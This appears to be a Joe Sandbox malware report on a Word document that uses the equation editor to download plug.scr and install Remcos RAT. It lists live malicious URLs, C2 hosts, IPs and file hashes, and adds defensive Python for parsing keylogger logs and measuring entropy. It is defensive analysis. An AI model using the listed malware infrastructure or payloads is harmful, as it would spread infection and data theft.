https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au | 0% | Avira URL Cloud | safe
http://sinopecllc.top/plug.scrj | 100% | Avira URL Cloud | malware
http://cdn.at.atwola.com/_media/uac/msn.html | 0% | Avira URL Cloud | safe
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset | 0% | Avira URL Cloud | safe
https://policies.yahoo.com/w3c/p3p.xml | 0% | Avira URL Cloud | safe
http://www.msn.com/advertisement.ad.js | 0% | Avira URL Cloud | safe
http://www.ebuddy.com | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
antfly50.sytes.net | 80.85.154.121 | true | true | | unknown
geoplugin.net | 178.237.33.50 | true | false | | unknown
sinopecllc.top | 31.192.235.145 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
antfly50.sytes.net | true | Avira URL Cloud: malware | unknown
http://sinopecllc.top/plug.scr | true | Avira URL Cloud: malware | unknown
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://b.scorecardresearch.com/beacon.js | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://sinopecllc.top/plug.scriiC: | EQNEDT32.EXE, 00000002.00000002.363969598.000000000030F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://acdn.adnxs.com/ast/ast.js | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://www.imvu.comr | plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_ | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1 | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://support.google.com/chrome/?p=plugin_flash | plugman23456.scr, 00000015.00000002.393286872.0000000002509000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9 | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net | plugman23456.scr, 00000015.00000002.392417743.0000000000254000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://deff.nelreports.net/api/report?cat=msn | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://cache.btrll.com/default/Pix-1x1.gif | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683 | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://www.google.com | plugman23456.scr, plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp/C | plugman23456.scr, 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, znlzneAxBVd.exe, 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://o.aolcdn.com/ads/adswrappermsni.js | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://www.msn.com/?ocid=iehp | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033 | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://static.chartbeat.com/js/chartbeat.js | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://www.msn.com/de-de/?ocid=iehp | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto% | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://login.yahoo.com/config/login | plugman23456.scr | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net/ | plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | plugman23456.scr, 00000005.00000002.378628217.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, znlzneAxBVd.exe, 0000000F.00000002.400864194.0000000002691000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3 | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683 | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids( | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9 | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://www.imvu.com/ | plugman23456.scr, 00000017.00000002.387492879.00000000001FC000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contextual.media.net/8/nrrV73987.js | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://www.imvu.com | plugman23456.scr, plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://sinopecllc.top/plug.scrC: | EQNEDT32.EXE, 00000002.00000003.363793468.0000000000387000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://contextual.media.net/ | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2 | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | EQNEDT32.EXE, 00000002.00000003.363803230.000000000033C000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.363803230.0000000000378000.00000004.00000020.00020000.00000000.sdmp, plug[1].scr.2.dr, znlzneAxBVd.exe.5.dr, plugman23456.scr.2.dr | false | URL Reputation: safe | unknown
http://www.msn.com/ | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://sinopecllc.top/plug.scrj | EQNEDT32.EXE, 00000002.00000002.363969598.000000000030F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549 | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://cdn.at.atwola.com/_media/uac/msn.html | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://www.google.com/accounts/servicelogin | plugman23456.scr | false | Avira URL Cloud: safe | unknown
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://policies.yahoo.com/w3c/p3p.xml | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://www.msn.com/advertisement.ad.js | bhvEBA7.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://www.ebuddy.com | plugman23456.scr, plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
80.85.154.121 | antfly50.sytes.net | Russian Federation | 44493 | CHELYABINSK-SIGNAL-ASRU | true
31.192.235.145 | sinopecllc.top | Russian Federation | 43948 | GLESYS-ASSE | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1465260
                        Start date and time:2024-07-01 13:57:05 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 10m 45s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:30
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Offer ZI-0428.doc
                        Detection:MAL
                        Classification:mal100.phis.troj.spyw.expl.evad.winDOC@30/27@3/3
                        EGA Information:
                        • Successful, ratio: 87.5%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 328
                        • Number of non-executed functions: 289
                        Cookbook Comments:
                        • Found application associated with file extension: .doc
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Active ActiveX Object
                        • Scroll down
                        • Close Viewer
                        • Override analysis time to 78580.3547309985 for current running targets taking high CPU consumption
                        • Override analysis time to 157160.709461997 for current running targets taking high CPU consumption
                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                        • Execution Graph export aborted for target EQNEDT32.EXE, PID 3240 because there are no executed function
• Not all processes were analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
04:58:08  Task Scheduler   Run new task: znlzneAxBVd path: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe
07:57:58  API Interceptor  285x Sleep call for process: EQNEDT32.EXE modified
07:58:01  API Interceptor  9672766x Sleep call for process: plugman23456.scr modified
07:58:03  API Interceptor  82x Sleep call for process: powershell.exe modified
07:58:04  API Interceptor  9x Sleep call for process: schtasks.exe modified
07:58:09  API Interceptor  34x Sleep call for process: znlzneAxBVd.exe modified
07:58:09  API Interceptor  205x Sleep call for process: taskeng.exe modified
Match: 178.237.33.50 (IP)
Associated Sample Name / URL | Detection | Threat Name | Context
cKiTq7RRCn.exe | malicious | Remcos | geoplugin.net/json.gp
INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | geoplugin.net/json.gp
INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | geoplugin.net/json.gp
Quotation.xls | malicious | Remcos | geoplugin.net/json.gp
awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbs | malicious | GuLoader, Remcos | geoplugin.net/json.gp
Maersk_BL_Invoice_Packinglist.vbs | malicious | GuLoader, Remcos | geoplugin.net/json.gp
Statement Of Account (2).vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
Payment Copy.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
SecuriteInfo.com.Exploit.ShellCode.69.26008.28945.rtf | malicious | Remcos | geoplugin.net/json.gp
UHUH45EDRFQ.exe | malicious | Remcos | geoplugin.net/json.gp
Match: sinopecllc.top (domain)
Associated Sample Name / URL | Detection | Threat Name | Context
file.rtf | malicious | Lokibot | 172.67.132.133
Enquiry_220062.doc | malicious | AgentTesla | 172.67.132.133
P7098769000.doc | malicious | Remcos | 172.67.132.133
Earlier submissions resolved sinopecllc.top to 172.67.132.133; in this analysis it resolved to 31.192.235.145 (GLESYS-ASSE), so pivot on the domain rather than the IP when hunting.

Match: geoplugin.net (domain)
Associated Sample Name / URL | Detection | Threat Name | Context
cKiTq7RRCn.exe | malicious | Remcos | 178.237.33.50
INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | 178.237.33.50
INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | 178.237.33.50
Quotation.xls | malicious | Remcos | 178.237.33.50
awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbs | malicious | GuLoader, Remcos | 178.237.33.50
Maersk_BL_Invoice_Packinglist.vbs | malicious | GuLoader, Remcos | 178.237.33.50
Statement Of Account (2).vbs | malicious | Remcos, GuLoader | 178.237.33.50
Payment Copy.vbs | malicious | Remcos, GuLoader | 178.237.33.50
SecuriteInfo.com.Exploit.ShellCode.69.26008.28945.rtf | malicious | Remcos | 178.237.33.50
UHUH45EDRFQ.exe | malicious | Remcos | 178.237.33.50
Match: CHELYABINSK-SIGNAL-ASRU (ASN)
Associated Sample Name / URL | Detection | Threat Name | Context
xJd712XMG6.exe | malicious | Phorpiex | 185.203.237.235
lRT1FK9PcL.exe | malicious | Phorpiex | 185.203.237.235
UGS - CRO REQ - KHIDUBAI (OPL-841724).scr | malicious | PureLog Stealer, zgRAT | 80.85.152.161
#U7535#U5b50#U53d1#U79682039920102-2022.jpg.htm | malicious | Unknown | 80.85.156.131
https://pub-c703dadea8164d9790f4641e531245a0.r2.dev/killarhDOC.html | malicious | HTMLPhisher | 80.85.152.20
file.exe | malicious | RedLine | 80.85.152.116
file.exe | malicious | Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar, Xmrig | 80.85.156.25
pYJ4V8A183.exe | malicious | AgentTesla | 185.144.31.89
0017062].exe | malicious | AveMaria, DBatLoader, UACMe | 80.85.153.111
wLZpYyx233.exe | malicious | RedLine | 80.85.152.191

Match: GLESYS-ASSE (ASN)
Associated Sample Name / URL | Detection | Threat Name | Context
https://link.mail.beehiiv.com/ls/click?upn=u001.AafWW5Nqnbo2z-2BTA50bGEdcgdlKW6veoHg9i0lfVykqgG210mMbY9x6wlCJFem63Ptvb1AhwNnKu2bFWir67u4CZi9kAG27a28kN3PuYedxeUyKmOac6ITo-2BRFaF-2Bd-2Fi2Ixv82DfFvf02BiAI4hE-2B33SFQFo6ls2LdouLvYQ4evOtL64w0kovPYLtYVrx27PXV8C_Brrq8-2Fl00XKb7EalRYiEGmX6heUjj2STeswY-2BsiIt8od5e7wnskh4Flyd2gRfoUQMNxCsUTDSaFM8zPDLSGDGP82i7-2F2T8vItuV5dWHeXDAA5lbmJvOIRHwwHLaZqkTAe-2FUo72xufSnVCNP9jOcjTziRyEgpuuJQJiZBB3fK9Jfw-2BwXqmN7-2Bgu5oQ-2B1xbFghH62g1lHFS1Y4CHHJPc0auTlLsB05ygQ-2FI-2F7sxR9u8jR91M7H-2BbzqUKzs-2BT3ZKLeFEIL3152abEbru7Xm-2FQccrWU8wpYyuMKn02Tn-2B2EMXTmjNNbbalm-2BJ6GnnTdkYphMczl4vx3aqH514BnG-2FxWL6zJOg9p0nIer2lira82L8b5vTqtEzMFFrshInaCk-2FIKuK7IqIBd82nujTq2sahPgOcOQZPE1-2F-2BLJyD2o7TtDkzFXunFRnYrxODO7DLzvTUoA#SZ2JyYWRsZXlAdmNjdW9ubGluZS5uZXQ=&d=DwMFaQ | malicious | HTMLPhisher | 31.192.232.57
DRAFT SHIPPING DOCUMENTS.exe | malicious | GuLoader, Lokibot | 31.192.239.29
SWU5109523I.exe | malicious | FormBook, Lokibot | 31.192.235.101
DBbkrVgETv.exe | malicious | Unknown | 37.152.57.102
gunzipped.exe | malicious | Lokibot | 31.192.235.208
2.exe | malicious | SmokeLoader | 194.54.164.123
1.exe | malicious | PureLog Stealer | 194.54.164.123
x86.elf | malicious | Mirai, Moobot | 194.132.99.16
xnYuUw7KjK.exe | malicious | AgentTesla, PureLog Stealer | 31.192.237.18
IDTVfeIKcu.elf | malicious | Unknown | 194.132.99.55

Match: ATOM86-ASATOM86NL (ASN)
Associated Sample Name / URL | Detection | Threat Name | Context
cKiTq7RRCn.exe | malicious | Remcos | 178.237.33.50
INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | 178.237.33.50
INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | 178.237.33.50
Quotation.xls | malicious | Remcos | 178.237.33.50
awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbs | malicious | GuLoader, Remcos | 178.237.33.50
Maersk_BL_Invoice_Packinglist.vbs | malicious | GuLoader, Remcos | 178.237.33.50
Statement Of Account (2).vbs | malicious | Remcos, GuLoader | 178.237.33.50
Payment Copy.vbs | malicious | Remcos, GuLoader | 178.237.33.50
SecuriteInfo.com.Exploit.ShellCode.69.26008.28945.rtf | malicious | Remcos | 178.237.33.50
UHUH45EDRFQ.exe | malicious | Remcos | 178.237.33.50
                        Process:C:\Users\user\AppData\Roaming\plugman23456.scr
                        File Type:data
                        Category:dropped
                        Size (bytes):298
                        Entropy (8bit):3.4904990494735313
                        Encrypted:false
                        SSDEEP:6:6lVVl55YcIeeDAlOWASA37hSNombQDgQB:6lVVlhec0W0LhykgM
                        MD5:B7CDBC33FBD0242689384EB7841A7C16
                        SHA1:E19C7F9119E113048EFE27056AB79E112E7A891C
                        SHA-256:BB813EE6D57C60330046812B887D93559FFBBFBDB9C7CDCDC1814DAF72BA7A56
                        SHA-512:2F2F09B8031C40C1B474B86495A706D7371790A11D69E0D0E826801D17F529F9A43DF60D66DA319D042F1D4E74B7AB3F464B54C7D8C81A31C85D3D0DD3549DE0
                        Malicious:true
                        Yara Hits:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                        Preview:....[.2.0.2.4./.0.7./.0.1. .0.7.:.5.8.:.0.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.O.f.f.e.r. .Z.I.-.0.4.2.8. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.M.i.c.r.o.s.o.f.t. .W.o.r.d.].....
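The preview above is the Remcos offline keylogger log (C:\ProgramData\remcos\logs.dat per the Yara hit), written as UTF-16LE without a BOM: the masked bytes are the NUL half of each character plus CR/LF pairs, and 149 characters at two bytes each is exactly the 298 bytes the report lists. The parser below is an added example, not part of the report or of Remcos: it decodes such a file, separates the timestamped session marker from window-focus titles, and attributes keystroke lines to the window they were typed into. The sample bytes are constructed from the preview; the convention that keystroke text follows the title line is an assumption (this sample holds focus changes only), and hashes() is there so you can compare the reconstruction with the MD5/SHA values listed above.

```python
import hashlib
import re

# Constructed sample: the 298-byte logs.dat from the report, rebuilt from its preview
# by reading the masked bytes as UTF-16LE CR/LF and NUL (no BOM). 149 chars x 2 = 298.
LOGS_DAT = (
    "\r\n[2024/07/01 07:58:06 Offline Keylogger Started]\r\n\r\n"
    "[Program Manager]\r\n\r\n"
    "[Offer ZI-0428 [Compatibility Mode] - Microsoft Word]\r\n\r\n"
    "[Microsoft Word]\r\n"
).encode("utf-16-le")

# A session marker carries a timestamp; a window-focus marker is just the title.
SESSION_RE = re.compile(r"^(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) (.+)$")


def decode_logs(raw: bytes) -> str:
    """Decode a logs.dat: honour a BOM if present, otherwise assume UTF-16LE."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16")
    return raw.decode("utf-16-le")


def parse_logs(raw: bytes) -> list[dict]:
    """Split the log into records.

    A line of the form '[...]' is a marker: either a timestamped session event or the
    title of the window that gained focus. Any other non-empty line is keystroke text,
    which is attributed to the most recent marker (assumption about the layout; the
    sample above contains no keystrokes).
    """
    records: list[dict] = []
    for line in decode_logs(raw).split("\r\n"):
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            body = line[1:-1]  # inner brackets in titles are preserved
            m = SESSION_RE.match(body)
            if m:
                records.append({"kind": "event", "time": m.group(1), "text": m.group(2), "keys": ""})
            else:
                records.append({"kind": "window", "title": body, "keys": ""})
        elif records:
            records[-1]["keys"] += line
        else:
            records.append({"kind": "keys", "keys": line})
    return records


def window_titles(raw: bytes) -> list[str]:
    """Titles in focus order: what the victim had open while the logger ran."""
    return [r["title"] for r in parse_logs(raw) if r["kind"] == "window"]


def hashes(raw: bytes) -> dict:
    """MD5/SHA-1/SHA-256 of the bytes, to compare with the values the report lists."""
    return {name: hashlib.new(name, raw).hexdigest() for name in ("md5", "sha1", "sha256")}


if __name__ == "__main__":
    for rec in parse_logs(LOGS_DAT):
        print(rec)
    print(hashes(LOGS_DAT))
```

If hashes(LOGS_DAT) reproduces the MD5 above, the byte-level reading of the preview is exact and the same routine can be pointed at a logs.dat recovered from an infected host; the window titles alone show what the victim had in focus at each log entry, which is often enough to scope exposure before any keystrokes are reviewed.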
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):0.34726597513537405
                        Encrypted:false
                        SSDEEP:3:Nlll:Nll
                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                        Malicious:false
                        Preview:@...e...........................................................
                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):1140744
                        Entropy (8bit):7.950319983509765
                        Encrypted:false
                        SSDEEP:24576:VcNkX126Z/zxDzTVt8Pyt1KjrJonp0+M+gw/gvXIw/qbw4:NX126zxvxt8P0IepJM+Tzk4
                        MD5:28F77C9AF8CB3EA886714BBFC8326635
                        SHA1:F6F02B22CD5A272C71A5AFA66EFD3B237FE4F24F
                        SHA-256:F251FE71103EF7BC4CBDBCFE9C1D7C4A595F831E51CF4064F2BFA595F47BDA35
                        SHA-512:03508E0F3F68696F4F7B64AA737D40E8BD24B69EA7860A8FABEE997D238454929605FE5B1EA0880AF14CF3A89763D46E1FDEB9A526700D570B0D672330B5F82D
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..............3... ...@....@.. ....................................@.................................L3..O....@...............2...6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......0..............@..B.................3......H............\......2...|....Q..........................................^..}.....(.......(.....*.0..+.........,..{.......+....,...{....o........(.....*..0................(....s......s....}.....(......{.....o......{....( ...o!.....{.....o".....{....o#....o$.....{....o#...( ...o%.....{.....o&.....{.....r...po'...t....o(.....{.... B....6s)...o*.....{....r...po+.....{.... >... ?...s,...o-.....{.....o......{.....o/....."...@"..PAs0...(1......(2......r1..po'...t....o3......o".....
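Entropy is the quickest triage signal in these listings: the 1,140,744-byte .NET PE that EQNEDT32.EXE dropped scores 7.95 bits per byte, which is what a compressed or encrypted embedded payload looks like even though the report's own Encrypted flag stays false, while the zero-filled and single-byte files further down score 0.0 and the two-byte UTF-16 file scores 1.0. The following added example (not report or Joe Sandbox code) computes 8-bit Shannon entropy the same way, reproduces those reference values from file shape alone, and walks a buffer in fixed windows to locate the high-entropy region, which is where an unpacker should look first. SAMPLE_BLOB, the band thresholds in classify() and the pseudo-random payload generator are constructed assumptions for illustration.

```python
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for one repeated value, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify(entropy: float) -> str:
    """Coarse triage bands; the thresholds are this example's assumption, not the sandbox's."""
    if entropy >= 7.2:
        return "compressed/encrypted"
    if entropy >= 4.5:
        return "code or mixed binary"
    if entropy > 0.0:
        return "text/structured"
    return "constant (padding or placeholder)"


def entropy_profile(data: bytes, window: int = 1024) -> list[tuple[int, float]]:
    """Entropy of each fixed-size window, keyed by its start offset."""
    return [(off, shannon_entropy(data[off:off + window])) for off in range(0, len(data), window)]


def high_entropy_regions(data: bytes, window: int = 1024, threshold: float = 7.0) -> list[tuple[int, int]]:
    """Merge adjacent windows at or above the threshold into (start, end) byte ranges."""
    regions: list[tuple[int, int]] = []
    for off, h in entropy_profile(data, window):
        if h < threshold:
            continue
        end = min(off + window, len(data))
        if regions and regions[-1][1] == off:
            regions[-1] = (regions[-1][0], end)
        else:
            regions.append((off, end))
    return regions


def _pseudo_random(n: int) -> bytes:
    """Deterministic stand-in for an encrypted payload (SHA-256 chain); constructed, not from the sample."""
    out, block = b"", b"seed"
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


# Constructed blob shaped like a dropper: zero-filled header region, an "encrypted"
# payload, then a run of ASCII text. No bytes from the analysed sample are used.
SAMPLE_BLOB = b"\x00" * 4096 + _pseudo_random(4096) + b"This program cannot be run in DOS mode." * 20


if __name__ == "__main__":
    # Shapes of three dropped files from the report, reproduced from size and content alone.
    print(shannon_entropy(b"\x00" * 16384))        # 16384-byte zero file: 0.0
    print(shannon_entropy(b"1"))                   # one-byte file "1": 0.0
    print(shannon_entropy(" ".encode("utf-16-le")))  # two distinct bytes: 1.0
    print(classify(7.950319983509765))             # the dropped .NET PE: compressed/encrypted
    print(high_entropy_regions(SAMPLE_BLOB))       # [(4096, 8192)]
```

Whole-file entropy of a PE is diluted by headers, import tables and string resources, so a packed .NET assembly can still read well under 8.0; the windowed profile is what isolates the encrypted resource or overlay and gives the offset to carve before running the sample again.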
                        Process:C:\Users\user\AppData\Roaming\plugman23456.scr
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):962
                        Entropy (8bit):5.012309356796613
                        Encrypted:false
                        SSDEEP:12:tklu+mnd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdbauKyGX85jvXhNlT3/7AcV9Wro
                        MD5:14B479958E659C5A4480548A393022AC
                        SHA1:CD0766C1DAB80656D469ABDB22917BE668622015
                        SHA-256:0F92BDD807D2F5C9947E1775A20231233043C171F62E1AFA705A7E7938909BFE
                        SHA-512:4E87CA47392DD9710F9E3D4A2124A34B41938986A4F43D50A48623DB1838C0D6CFF05FD2A23792DCD5A974A94416C97DC04ECEF85025FC785F3393B69A0B1DC5
                        Malicious:false
